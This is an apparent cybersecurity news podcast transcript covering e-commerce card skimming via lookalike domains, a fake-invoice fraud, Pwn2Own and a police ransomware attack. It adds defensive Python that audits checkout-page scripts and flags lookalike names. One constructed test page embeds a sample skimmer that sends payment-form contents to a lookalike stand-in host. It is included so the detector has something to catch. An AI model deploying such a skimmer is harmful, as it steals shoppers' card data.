Fake name scams hit e-commerce companies, Facebook and Google, hackers earn big money for finding bugs and U.K. police hit by ransomware
Welcome to Cyber Security Today. It’s Friday March 22nd. I’m Howard Solomon, contributing reporter on cyber security for ITWorldCanada.com. To hear the podcast, click on the arrow below:
At the beginning of the week I told you about hackers compromising seven e-commerce web sites to skim off credit card information. Well, security vendor RiskIQ said Thursday it has discovered websites of two more online companies that have been hit: bedding retailers MyPillow.com and Amerisleep.
One of the ways this scam works is by registering a fake web site with a name almost identical to the target company’s, so customers don’t realize they’ve gone to a phony site when they enter their credit card information. In one case the attackers registered “mypiltow.com”, betting that customers would not notice that the double L in “pillow” had become “LT”.
A new tactic is intercepting the live chat support function on a website. Then they can skim off customer comments and possibly personal information and passwords.
(UPDATE: After this podcast was recorded RiskIQ clarified that the new tactic is including code for a live chat support function on the fake website, which mimics the live chat capability users would expect to see on the real site. It also serves to hide the skimmer code the attacker added.)
The lesson is that e-commerce companies have to do a better job of making sure the code on their web sites doesn’t change without their knowledge. That means keeping a baseline of every script a checkout page serves, third-party ones included, and raising an alert whenever a script is added, altered, or loaded from a domain that isn’t on the approved list.
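One way to do that check, as an added example that is not code from RiskIQ or from either retailer: snapshot the `<script>` tags a page serves, hash the inline ones, record where the external ones are loaded from, and diff a later snapshot against the baseline. The two HTML pages, the approved host list and the `.example` domains below are constructed for the demonstration; the injected script uses a lookalike host (“sh0p” for “shop”) of the kind described above.

```python
"""Detect unexpected changes to the scripts a storefront page serves.

Added example, not the retailers' or RiskIQ's code. A skimmer usually shows
up as a new inline <script> block or a new external <script src=...> that
points at an attacker-controlled host, so the audit reports both.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect every <script>: external ones by src, inline ones by body hash."""

    def __init__(self):
        super().__init__()
        self.external = []   # src URLs in document order
        self.inline = []     # sha256 hex digests of inline bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._buf).strip().encode()
            self.inline.append(hashlib.sha256(body).hexdigest())


def snapshot(html):
    """Return {'external': [src, ...], 'inline': [sha256, ...]} for a page."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return {"external": parser.external, "inline": parser.inline}


def audit(baseline, current, allowed_hosts):
    """Compare two snapshots; an empty list means nothing changed."""
    findings = []
    for src in current["external"]:
        host = urlparse(src).hostname or ""
        if src not in baseline["external"]:
            findings.append(f"new external script: {src}")
        if host and host not in allowed_hosts:
            findings.append(f"script loaded from unapproved host: {host}")
    for digest in current["inline"]:
        if digest not in baseline["inline"]:
            findings.append(f"new or modified inline script: sha256={digest[:16]}...")
    for src in baseline["external"]:
        if src not in current["external"]:
            findings.append(f"expected script missing: {src}")
    return findings


# Constructed sample: the checkout page as deployed (the baseline).
BASELINE_HTML = """<html><head>
<script src="https://cdn.shop.example/jquery.min.js"></script>
<script>window.checkout = {currency: "CAD"};</script>
</head><body><form id="pay"></form></body></html>"""

# Constructed sample: the same page after a skimmer injection. One extra
# external script from a lookalike host (sh0p, not shop) and one extra
# inline block that exfiltrates the payment form.
TAMPERED_HTML = """<html><head>
<script src="https://cdn.shop.example/jquery.min.js"></script>
<script>window.checkout = {currency: "CAD"};</script>
<script src="https://cdn.sh0p.example/chat.js"></script>
<script>document.forms[0].onsubmit = function () {
  new Image().src = "https://cdn.sh0p.example/c?" + encodeURIComponent(document.forms[0].innerText);
};</script>
</head><body><form id="pay"></form></body></html>"""

# Constructed allowlist of hosts the store expects to load scripts from.
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example"}


def run_demo():
    """Audit the tampered page against the baseline; returns the findings."""
    return audit(snapshot(BASELINE_HTML), snapshot(TAMPERED_HTML), ALLOWED_HOSTS)


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

Running it reports three findings for the tampered page and none when the baseline is compared with itself. In production the baseline would be re-captured on every approved deployment and the fetch done from outside the store’s own network, so that a server-side injection that only targets real customers is still seen.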
Speaking of similar name scams, ZDNet reports a Lithuanian man pleaded guilty in New York this week to defrauding Google and Facebook out of $123 million by using fake invoices to trick employees into wiring money to him. He did it by setting up a company with a name similar to that of a computer supplier called Quanta that both Google and Facebook use. Then, using that similar company name, he emailed invoices to Google and Facebook, correctly betting that accounting staff wouldn’t notice the slight difference. The man faces a maximum sentence of 30 years in prison.
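The domain trick in the MyPillow story and the vendor-name trick in this one are the same problem: a string that is one character, or one easily confused character pair, away from a trusted one. As an added example, not code from any of the companies or reporters named above, the check below folds common look-alike characters (“0” for “o”, “1” for “l”, “rn” for “m”) before comparing, then falls back to edit distance. It is applied here to hostnames (compared by their registrable label) and to invoice payee names. The watchlist entries, including the “Quanta Computer Inc.” spelling, and all the candidate names are constructed; the only one taken from the story is “mypiltow.com”.

```python
"""Flag domain names and payee names that look like a trusted one.

Added example, not from RiskIQ, ZDNet or the companies named in the story.
One check serves both cases discussed above: the hostname a customer (or a
checkout page's script tag) ends up at, and the payee on an incoming invoice.
"""
import re

# Substitutions a reader tends not to notice. A starting point, not a full
# Unicode confusables table; extend it for the alphabets you actually see.
CONFUSABLES = {"0": "o", "1": "l", "3": "e", "5": "s", "rn": "m", "vv": "w"}


def normalize(name):
    """Lowercase and keep only letters and digits, so 'Inc.' and 'Inc' agree."""
    return re.sub(r"[^a-z0-9]", "", name.lower())


def skeleton(name):
    """normalize() plus confusable folding: 'Cornputer' and 'Computer' collide."""
    s = normalize(name)
    for lookalike_chars, real in CONFUSABLES.items():
        s = s.replace(lookalike_chars, real)
    return s


def levenshtein(a, b):
    """Plain edit distance (insert, delete, substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(candidate, trusted, max_distance=1):
    """Return (verdict, reason): 'exact', 'lookalike' or 'unrelated'."""
    if normalize(candidate) == normalize(trusted):
        return ("exact", "same spelling")
    if skeleton(candidate) == skeleton(trusted):
        return ("lookalike", "identical after confusable folding")
    distance = levenshtein(skeleton(candidate), skeleton(trusted))
    if distance <= max_distance:
        return ("lookalike", f"edit distance {distance}")
    return ("unrelated", f"edit distance {distance}")


def registrable_label(host):
    """'www.mypiltow.com' -> 'mypiltow'. Assumes a one-label public suffix;
    a real deployment should consult the Public Suffix List instead."""
    parts = host.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def check_domain(host, trusted_domain):
    return classify(registrable_label(host), registrable_label(trusted_domain))


def check_payee(name, trusted_name):
    return classify(name, trusted_name)


# Constructed samples. The trusted domain is the real retailer's; the
# vendor spelling and every other candidate are invented for the demo.
TRUSTED_DOMAIN = "mypillow.com"
DOMAIN_SAMPLES = ["mypiltow.com", "www.mypillow.com", "mypi11ow.com", "bedding-deals.example"]
TRUSTED_VENDOR = "Quanta Computer Inc."
PAYEE_SAMPLES = ["Quanta Computer Inc.", "Quanta Cornputer Inc.",
                 "Quanta Computers Inc", "Northern Office Supply"]


def run_demo():
    """Classify every sample; returns {'domains': {...}, 'payees': {...}}."""
    return {
        "domains": {h: check_domain(h, TRUSTED_DOMAIN) for h in DOMAIN_SAMPLES},
        "payees": {n: check_payee(n, TRUSTED_VENDOR) for n in PAYEE_SAMPLES},
    }


if __name__ == "__main__":
    for kind, results in run_demo().items():
        for name, (verdict, reason) in results.items():
            print(f"{kind:8} {name:28} {verdict:10} ({reason})")
```

The useful property is that “mypi11ow.com” and “Quanta Cornputer Inc.” are caught by folding alone, where raw edit distance would score them 2 and 2 and a threshold of 1 would miss them. For invoices, the name check is only a first gate; the stronger control is that a change of bank account for an existing vendor is confirmed out of band, with a phone number already on file rather than one printed on the new invoice.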
There are criminal ways of earning money by hacking, and legitimate ways. One legit way is by participating in a bug hunting contest. One has been underway this week in Vancouver, British Columbia at the annual Pwn2Own (pronounced “pone to own”) contest organized by Trend Micro’s Zero Day Initiative. On the first day a two-person team earned $160,000 of the $240,000 given out for finding holes in various pieces of software like the Safari browser. The prize pool for the three-day event is over $1 million. Contests like these help find bugs before criminals do, and help teach companies how to code better.
Finally, police in the U.K. have opened a criminal investigation into a ransomware attack that hit the computer systems and email service of the police association. The incident started over a week ago but word is only now getting out. Data on computers was encrypted. Unfortunately the attack also deleted crucial backup data. That’s usually a sign the backup system wasn’t properly isolated from the main network: if the backup store is permanently mounted, or writable with the same credentials an attacker gets by compromising a workstation or server, the ransomware will encrypt or delete it along with everything else. Backups are an essential defence against ransomware, but only if at least one copy is kept offline or otherwise unreachable from the production network and is regularly tested by restoring from it. The police association doesn’t think it was a targeted attack.
That’s it for Cyber Security Today. Links to details about these stories can be found in the text version of each podcast at ITWorldCanada.com. That’s where you’ll also find my news stories aimed at businesses and cyber security professionals. Cyber Security Today can be heard Mondays, Wednesdays and Fridays. Subscribe on Apple Podcasts, Google Podcasts or add us to your Flash Briefing on your smart speaker. Thanks for listening.